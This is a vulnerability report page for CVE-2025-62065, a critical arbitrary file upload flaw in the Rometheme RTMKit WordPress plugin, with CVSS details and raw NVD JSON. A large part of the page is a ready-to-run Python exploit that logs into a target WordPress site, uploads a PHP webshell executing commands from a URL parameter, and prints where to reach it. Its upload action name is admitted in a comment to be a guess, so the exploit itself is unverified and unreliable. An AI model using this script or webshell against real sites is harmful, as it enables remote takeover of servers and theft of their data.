Security Vulnerability Report
中文
CVE-2025-62065 CVSS 9.9 CRITICAL

CVE-2025-62065

Published: 2025-11-06 16:16:12
Last Modified: 2026-04-15 00:35:42

Description

Unrestricted Upload of File with Dangerous Type vulnerability in Rometheme RTMKit rometheme-for-elementor.This issue affects RTMKit: from n/a through <= 1.6.5.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Rometheme RTMKit rometheme-for-elementor <= 1.6.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62065 PoC - Arbitrary File Upload # Target: WordPress with Rometheme RTMKit plugin <= 1.6.5 def upload_shell(target_url, username, password): """ Upload a PHP webshell to target WordPress site """ login_url = target_url + '/wp-login.php' upload_url = target_url + '/wp-admin/admin-ajax.php' # Step 1: Login to WordPress session = requests.Session() login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } print('[+] Attempting to login...') response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in str(session.cookies): print('[-] Login failed!') return False print('[+] Login successful!') # Step 2: Upload malicious PHP file webshell = '<?php system($_GET["cmd"]); ?>' files = { 'file': ('shell.php', webshell, 'application/x-php') } data = { 'action': 'rtmkit_upload', # Possible action name 'post_id': '1' } print('[+] Uploading webshell...') try: response = session.post(upload_url, data=data, files=files, timeout=10) if response.status_code == 200: print('[+] File uploaded successfully!') print('[+] Access shell at: ' + target_url + '/wp-content/uploads/shell.php?cmd=whoami') return True except Exception as e: print(f'[-] Upload failed: {e}') return False if __name__ == '__main__': if len(sys.argv) < 5: print(f'Usage: python {sys.argv[0]} <target_url> <username> <password>') print(f'Example: python {sys.argv[0]} http://target.com admin password') sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] upload_shell(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62065", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:12.473", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unrestricted Upload of File with Dangerous Type vulnerability in Rometheme RTMKit rometheme-for-elementor.This issue affects RTMKit: from n/a through <= 1.6.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/rometheme-for-elementor/vulnerability/wordpress-rtmkit-plugin-1-6-5-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}]}}